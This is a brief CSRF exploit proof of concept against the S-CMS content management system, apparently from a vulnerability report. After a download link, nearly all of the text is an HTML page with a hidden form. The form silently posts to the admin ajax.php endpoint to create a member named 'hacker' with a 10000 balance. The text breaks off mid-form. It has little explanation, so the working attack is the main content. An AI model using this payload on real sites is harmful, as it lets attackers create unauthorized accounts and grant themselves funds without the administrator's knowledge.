Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip CSRF Exp: <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html" charset="utf-8" /> </head> <body> <center><h1>fake request</center> <div> <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form"> <input type="hidden" name="M_login" value="hacker"> <input type="hidden" name="M_pwd" value="hacker"> <input type="hidden" name="M_money" value="10000"> <input type="hidden" name="M_fen" value="0"> <input type="hidden" name="M_name" value="1"> <inpu...